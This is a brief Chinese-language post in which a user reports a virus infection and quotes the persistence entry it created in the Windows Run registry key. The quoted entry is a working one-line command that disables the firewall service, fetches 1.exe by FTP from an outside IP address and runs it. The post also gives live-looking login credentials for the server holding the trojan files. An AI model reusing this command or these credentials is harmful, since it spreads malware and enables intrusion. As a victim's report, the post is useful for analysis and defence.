昨天上网种了病毒,
发现该病毒会在注册表的开机启动建立一个项:
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[shell]
注册表内容:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 61.164.117.80> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi
进程:D:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
在C盘的system32下建立一个isql的文件夹,然后从 61.164.117.80下载木马到isql下
现在用
ftp://61.164.117.80/ 用户密码都是123还可以登录,登录后可以看到木发1.exe,2.exe,4.exe ,lpk.dll
用户系统信息:Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.8.131 Version/11.11